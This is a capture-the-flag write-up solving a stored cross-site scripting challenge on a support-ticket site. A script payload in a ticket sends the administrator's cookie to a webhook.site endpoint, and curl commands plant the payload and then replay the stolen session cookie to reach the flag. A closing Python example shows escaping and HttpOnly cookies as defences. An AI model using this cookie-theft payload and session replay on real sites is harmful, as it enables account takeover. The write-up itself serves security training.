Writeup DGA - CTF - Internal Support 1

This article describes my solution for the 100-point challenge called “Internal Support 1”.

Introduction

The "Internal Support" application lets the DGA provide support to its agents. As a new hire, you can register right away.
Every support request is now handled by our administrators in record time.

Taking an attacker's stance, your goal is to manage to log in as an administrator.
Unfortunately for you, the password is far too strong; you will have to find another way.

Start

We have at our disposal a ticket management platform. You need to be registered and logged in to submit a ticket. It is possible to choose the type of ticket, but this does not affect the response that is given. Incidentally, the answers are automated and generally bear no relation to the question asked.

However, there is one crucial piece of information: the tickets are processed by the administrators, and the objective of the challenge is to log in as an administrator. Authentication on websites is most commonly done through session cookies. If we manage to steal the administrator's cookie, and if the security measures are weak, we can log in as the administrator.

Cross-Site Scripting (XSS)

An XSS vulnerability allows an attacker to inject content into a page, which is then executed by the browsers of users visiting that page.

Cookies are accessible from JavaScript via document.cookie. This means that if we manage to execute malicious code on the administrator's page, we will be able to retrieve his authentication cookie.

To develop our attack, we will use the webhook.site tool, which lets us inspect HTTP requests made to the endpoint it provides. Here is the endpoint the tool gave me during my attack.

https://webhook.site/8d1556b1-49f1-4ba0-b934-0e7785789807

In order to retrieve an HTTP request with all the elements needed to create a ticket (including our own session cookie), I created a ticket on the platform and copied the request in cURL format from the network tab of my web browser's developer tools.

By analyzing the HTTP request, we can see that the content of the ticket is sent in the message parameter of the POST body (--data-raw with cURL). So our payload must be inserted in this parameter.

Here is the payload used.

<script>document.write('<img src="https://webhook.site/8d1556b1-49f1-4ba0-b934-0e7785789807?cookie='+document.cookie+'"/>')</script>

As you can see, I added document.cookie as the value of the cookie query-string parameter. As soon as a request is made to the provided endpoint, the cookie is automatically included in it.

The payload must be URL-encoded to avoid character interpretation problems.

Here’s what I get.

%3Cscript%3Edocument.write%28%27%3Cimg%20src%3D%22https%3A%2F%2Fwebhook.site%2F8d1556b1-49f1-4ba0-b934-0e7785789807%3Fcookie%3D%27%2Bdocument.cookie%2B%27%22%2F%3E%27%29%3C%2Fscript%3E

We can now build our malicious request. Note that I don't use cURL's -L flag: by not following the redirect, I avoid sending my own cookie to the tool, so the only cookie it receives is the administrator's.

curl 'http://internalsupport12.chall.malicecyber.com/#i-need-help' -H 'Cookie: session=.eJwlTstqwzAQ_BWhcyherbTS5it6L8FI2lVs6sbFck4h_15BT8M8mJmXnduW-6LdXr9e1pwD7I_2nu9qL_Zz09zVbPvdrA9z7ibXOkxzLms3vyPzYW_v22WUHNoXez2Ppw62ir3aBOQDo2MuLE5bDEUgh1REI5dCLYhiw8hYyCfiVNUVQnARgSskr45kkjJp9LFpSyij0UH20ZWKCi1wwJxkmDhVxzL2GlBsLjopOO7Pz67H_xsetPajzef-rY8hxIwNJDCAQqZSRUWzCEWqEOqUKkVPgZx9_wEE0VZc.X7ru_w.INiRGHa1V773dKuW5jkvXEWnTq4' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'csrf_token=IjdhM2YxZDU5MTFlMWE2YmNkZWRlYWRkNjc2YzE1YzA4YzY3NDY1NjIi.X7ru_w.b1Q2xnL9YCLIRFjrHmgJqci2TZc&title=test&category=password_reset&message=%3Cscript%3Edocument.write%28%27%3Cimg%20src%3D%22https%3A%2F%2Fwebhook.site%2F8d1556b1-49f1-4ba0-b934-0e7785789807%3Fcookie%3D%27%2Bdocument.cookie%2B%27%22%2F%3E%27%29%3C%2Fscript%3E'

Here's the response we got.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/ticket/13/">/ticket/13/</a>.  If not click the link.

A few seconds later, we receive a notification from the HTTP request capture tool. The administrator's cookie is indeed included in the request.

We can now forge an HTTP GET request to the home page with the administrator's cookie, by changing the value of the session attribute in the Cookie header.

curl 'http://internalsupport12.chall.malicecyber.com/' -H 'Cookie: session=.eJwljk1qAzEMha9ivA7FGsuynVN0X0KQZSkJTTNlPFmF3L2Grh7vh8f38me787jq8Mevl3f7FP-jY_BF_cF_3pWHuvt6cbeH21fHIrN0-_U23O_cfPjT-3SYJ5uOqz_u21Onu3V_9FVSbA1r6kCQWZcMVjhzpBwEMSBBNQrGNZfUE2C2Tka9kGTFHDhEVLO0lKVIaYl7JqtkwKagVGNVYwxLSti5cs4IkclSSy1Q62nin59Dt38amFbGZud9_dbHDARjAallkklovbPBIq1pROQiixiBMkjw7z_-SFck.X7rwJw.gKFptnh4Gn48UYXLdGmU9p30pHk'

Executing this request, the following HTML element appears in the response.

<p class="text">
	- Hide the flag &#34;NoUserValidationIsADangerousPractice&#34; a little bit better
</p>

It is also possible to modify our cookie in the browser (via the Storage tab of the developer tools) and access the administrator view directly.

That completes this challenge; the validation flag is: NoUserValidationIsADangerousPractice.
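To close, here is an added example (my own illustration, not the challenge's code or the writeup's original content) showing the two defensive measures that would have stopped this exact chain: HTML-escaping the ticket message before it is interpolated into the page, and marking the session cookie HttpOnly so document.cookie cannot read it. The encoded payload below is the one from the writeup; the rendering functions and the Set-Cookie builder are assumptions about how a ticket page could be implemented, not the real application's code.

```python
"""Added example: safe rendering of an untrusted ticket message and a
session cookie that document.cookie cannot read. Not the challenge's code."""
import html
from urllib.parse import unquote

# The URL-encoded payload exactly as it appears in the writeup's POST body.
ENCODED_PAYLOAD = (
    "%3Cscript%3Edocument.write%28%27%3Cimg%20src%3D%22https%3A%2F%2F"
    "webhook.site%2F8d1556b1-49f1-4ba0-b934-0e7785789807%3Fcookie%3D"
    "%27%2Bdocument.cookie%2B%27%22%2F%3E%27%29%3C%2Fscript%3E"
)


def decode_form_value(value: str) -> str:
    """Reverse the URL encoding applied to a form field of the POST body."""
    return unquote(value)


def render_ticket_vulnerable(message: str) -> str:
    """Hypothetical renderer that behaves like the challenge page: the message
    is dropped into the HTML verbatim, so any markup it carries runs in the
    browser of whoever views the ticket (here, the administrator)."""
    return f'<p class="text">{message}</p>'


def render_ticket_hardened(message: str) -> str:
    """Same page, but the message is HTML-escaped first: '<' becomes '&lt;',
    quotes become entities, so the browser displays the payload as text."""
    return f'<p class="text">{html.escape(message, quote=True)}</p>'


def session_set_cookie(value: str, *, http_only: bool = True,
                       secure: bool = True) -> str:
    """Build a Set-Cookie header for the session cookie (hypothetical helper).
    HttpOnly removes the cookie from document.cookie, which is the only
    channel the payload above uses; Secure keeps it off plain HTTP."""
    parts = [f"session={value}", "Path=/", "SameSite=Lax"]
    if http_only:
        parts.append("HttpOnly")
    if secure:
        parts.append("Secure")
    return "; ".join(parts)


def contains_active_markup(rendered_html: str) -> bool:
    """Crude check used only to contrast the two renderers: does the output
    still contain a raw <script> or <img> tag?"""
    lowered = rendered_html.lower()
    return "<script" in lowered or "<img" in lowered


if __name__ == "__main__":
    payload = decode_form_value(ENCODED_PAYLOAD)
    print("vulnerable:", render_ticket_vulnerable(payload))
    print("hardened:  ", render_ticket_hardened(payload))
    # Constructed placeholder value; a real app would use its signed session.
    print(session_set_cookie("PLACEHOLDER-SESSION-VALUE"))
```

With escaping in place the administrator sees the literal text of the payload in the ticket, and with HttpOnly set, even a script that does run has nothing to read from document.cookie. Both measures are independent, and an application should apply both.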